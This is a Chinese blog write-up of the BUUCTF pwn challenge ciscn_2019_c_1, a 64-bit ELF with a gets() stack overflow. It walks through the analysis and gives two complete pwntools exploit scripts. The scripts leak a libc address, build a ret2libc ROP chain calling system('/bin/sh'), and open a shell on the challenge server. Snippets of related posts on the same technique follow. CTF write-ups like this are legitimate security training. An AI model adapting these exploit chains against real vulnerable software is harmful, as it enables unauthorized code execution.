buuctf之ciscn_2019_c_1

最新推荐文章于 2025-04-15 21:22:02 发布
最新推荐文章于 2025-04-15 21:22:02 发布
阅读量877 收藏 10
点赞数 10
文章标签: pwn ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54452942/article/details/137909969
版权

ciscn_2019_c_1

一、查看属性

首先还是必要的查看属性环节:

可以知道该文件是一个x86架构下的64位小端ELF文件,开启了栈不可执行(NX)
在这里插入图片描述
执行一下,先有一个选择,1是加密,2没什么功能,3退出
在这里插入图片描述

二、静态分析

先看一看主程序:一个初始化函数,一个begin函数还有一个encrypt函数
在这里插入图片描述
分别进去看一看,直到看到encrypt函数,这里有一个gest函数
在这里插入图片描述
这样的话,这道题的大概思路就是利用这个gets去溢出控制程序执行方向,但是这个题的问题就在于没有给可利用的函数以及没有调用system,比较经典的ret2libc

三、动态分析

我们动态跑一下,直接断到encrypt函数
在这里插入图片描述
单步n到gets函数,然后输入几个a
在这里插入图片描述
之后查看栈,我们发现ret地址距输入点距离为0xdf08-0xdeb0,也就是88个字节
在这里插入图片描述
在这里插入图片描述

四、思路

没有可直接利用的函数,我们就从库里找,本地破的话就用/usr/lib/x86_64-linux-gnu/libc-2.31.so就可以了
在这里插入图片描述
大致原理就是动态链接的时候,库函数被加载时,相对偏移是相同的,程序会把库整体加载进内存空间,我们只需要找到被调用的函数(puts)的got表项,利用库内函数的相对位移来计算出目标函数(system)的地址
在此之前我们先找到64为程序ROP的必要的ROP片段:
在这里插入图片描述
找到“/bin/sh”
在这里插入图片描述

五、exp

本地:libc需要自己vmmap换

from pwn import*
 
#io = process('./ciscn_2019_c_1')
io = remote('node5.buuoj.cn',26526)
#io = gdb.debug('./ciscn_2019_c_1','break encrypt')

elf = ELF('./ciscn_2019_c_1')
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')
 
main_addr = elf.symbols['main'] 
pop_rdi = 0x400c83
ret = 0x4006b9 
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
 
io.sendlineafter('Input your choice!\n','1')
payload = b'\0'+ b'a' * (88-1) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter('Input your Plaintext to be encrypted\n',payload)
io.recvline()
io.recvline()
puts_addr=u64(io.recvuntil('\n')[:-1].ljust(8,b'\0'))
print(hex(puts_addr))

binsh_libc = 0x1b45bd
system_libc = libc.symbols['system']
puts_libc = libc.symbols['puts']


system_addr = (system_libc - puts_libc) + puts_addr
binsh_addr = (binsh_libc - puts_libc) + puts_addr 

print(hex(system_addr))
print(hex(binsh_addr))
io.sendlineafter('Input your choice!\n','1')
payload = b'\0'+b'a'*(88-1) + p64(ret) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
io.sendlineafter('Input your Plaintext to be encrypted\n',payload)
 
io.interactive()

远程:

from pwn import*
from LibcSearcher import*
 
#io = process('./ciscn_2019_c_1')
io = remote('node5.buuoj.cn',26526)

elf=ELF('./ciscn_2019_c_1')
 
main_addr = elf.symbols['main'] 
pop_rdi = 0x400c83
ret = 0x4006b9
 
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
 
io.sendlineafter('Input your choice!\n','1')
payload = b'\0'+ b'a' * (88-1)
payload=payload+p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter('Input your Plaintext to be encrypted\n',payload)
io.recvline()
io.recvline()
puts_addr=u64(io.recvuntil('\n')[:-1].ljust(8,b'\0'))
print(hex(puts_addr))

libc = LibcSearcher('puts',puts_addr)
Offset = puts_addr - libc.dump('puts')
binsh = Offset+libc.dump('str_bin_sh')
system_addr = Offset+libc.dump('system')
print(hex(system_addr))
print(hex(binsh))
io.sendlineafter('Input your choice!\n','1')
payload = b'\0'+b'a'*(88-1) + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system_addr)
io.sendlineafter('Input your Plaintext to be encrypted\n',payload)
 
io.interactive()
为萤
关注
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4495
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 487
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
[BUUCTF]ciscn_2019_c_1
Lucien_Carr的博客
04-08 1593
想办法通过encrypt函数的 get函数栈溢出获得其中一个函数的地址(本题选择puts),通过LibcSearcher得到该函数在对应libc中的偏移量。没有‘system’,‘bin/sh’等有用的字符串,函数列表里也没有system等后门函数。该程序中并没有system,bin/sh等有用的字符串,无法使用ret2text。也没有构造溢出的函数,但是有很多puts,很好后面ret2libc可以用。通过已经调用过的函数泄露它在程序中的地址,然后利用地址末尾的3个字节,在。没什么能构造溢出的函数。
ciscn_2019_c_1 1(地址泄露,64位ROP,栈溢出)
最新发布
Snk0xHeart的博客
04-15 2345
执行 pop rdi,将 puts_got 地址放入 rdi 寄存器。执行 puts_plt,调用 puts 函数,puts 函数根据 rdi 寄存器中的地址,打印出 puts 函数的实际地址,实现地址泄露。执行 main,程序返回到 main 函数,等待我们进行下一次输入和攻击。在 64 位程序中,ROP 链的栈布局通常如下:栈地址 值 作用返回地址 pop_rdi 跳转到 pop rdi;ret下一个值 puts_got 被弹出到 rdi 寄存器。
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1439
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
BUUCTF ciscn_2019_c_1
N1rvana的博客
11-14 5060
一道积攒了很久才解出来的题,这道题大体不难,但是好多小细节呜呜呜。而且Libcsearcher里的libc库没更新(上篇博客讲了)。 这道题是BUUCTF上的ciscn_2019_c_1。标准的64位ROP流程,我也就分享一下自己的坎坷心路历程。 代码审计 老规矩checksec一下,只开了nx保护。 观察main函数 显然哦,只有输入1才有点用。 关键函数:encrypt() 发现一个栈溢出漏洞。ROP链的入口。 然后就是读取s的长度,在长度范围内对内容进行加密:也就是根据ascii码范围不同来进行
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 922
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
BUUCTF - PWNciscn_2019_c_1
古月浪子的博客
03-20 4229
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 6034
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
[BUUCTF]-PWN:ciscn_2019_final_3解析(tcache dup)
2301_79326813的博客
02-15 516
查看保护RELRO保护为FULL,got表不可修改,只能修改hook表了查看ida这里的大致功能为alloc创建堆块(可填充内容)、free释放堆块(但是不清空指针)值得注意的就是创建堆块大小不可以超过0x78(实际大小会对齐)
buuctf--ciscn_2019_c_1
2301_81060697的博客
02-20 711
获取libc库构造rop链
ciscn_2019_c_1
怪味巧克力的博客
07-18 651
0x01 检查文件,64位 检查开启的保护情况 开启了NX保护 0x02 IDA静态分析 在主函数这里并没有常见的gets栈溢出,尝试再这里面的子函数找找,发现了encrypt函数,进去查看 发现这个变量x的自增是由空间大小限制的,猜测这里会出现栈溢出漏洞,写出exp尝试溢出 0x03 exp: from pwn import * from LibcSearcher import * content = 0 context(os='linux', arch='amd64', log_level='
[BUUCTF]ciscn_2019_c_1 1
weixin_55013445的博客
10-01 284
可知,该程序开启了NX(栈不可执行)保护再使用IDA进行反汇编对代码进行分析可知,漏洞点在encrypt()函数的gets()上到此,思路明确,我们可以通过gets()的栈溢出漏洞,获取libc的基地址,接着通过libc的基地址获取system和str_bin_sh的地址,最后执行system(“/bin/sh”)
[buuuctf]ciscn_2019_c_1
逆向萌新的博客
06-16 495
[buuuctf]ciscn_2019_c_1细致教程
BUUCTFciscn_2019_c_1
2201_75556700的博客
11-30 1271
1、kali分析文件2、运行文件:3、64位ida分析文件,在函数名那里可以看到有三个函数:main,encrypt,begin在main函数中调用了这两个函数,还调用了puts函数,puts函数是libc库中的函数encrypt函数中调用了gets危险函数;gets函数是libc库中的一个函数4、shift+f12查看字符串,这里没有调用system也没有后门,猜测是利用ret2libc。
buuctf pwn others_shellcode
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成该挑战,需了解所使用的`libc`版本特性以及其对应的函数偏移地址等信息。这有助于定位并利用可能存在的漏洞点。此外,还需掌握基本的反汇编技能以便理解二进制文件的工作原理。 #### 漏洞分析 通过对程序逻辑的研究发现存在一处可以被攻击者控制的数据输入路径。当用户提交恶意构造的数据时,能够覆盖返回地址从而改变正常流程指向自定义指令序列的位置。这种技术被称为“Return-Oriented Programming (ROP)” 或直接注入 shellcode 执行。 #### Shellcode 构建 考虑到现代操作系统防护机制如NX bit 和 ASLR 的存在,在构建有效载荷时需要特别注意避开非法字符以免破坏栈结构完整性。同时也要考虑如何绕过这些安全措施以确保 payload 成功运行。一种常见做法是从内存中寻找可写区域作为跳转目标,并在那里放置精心设计过的 machine code 来打开 shell 或连接远程服务器发送 flag。 ```python from pwn import * context.arch = 'amd64' context.os = 'linux' # 连接至服务端口 conn = remote('challenge_address', port_number) # 发送payload前先读取一些数据防止阻塞 conn.recvuntil(b'Input your choice:') ``` #### Exploit 实现 最终解决方案涉及多个部分协同工作:首先是找到合适的 gadget 组合用于泄露 libc 基址;其次是计算出 system() 函数的确切位置;最后则是巧妙安排参数传递方式使得 execve("/bin/sh", ...) 能够被执行。整个过程要求精确控制每一步操作以达到预期效果而不触发任何异常终止条件。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值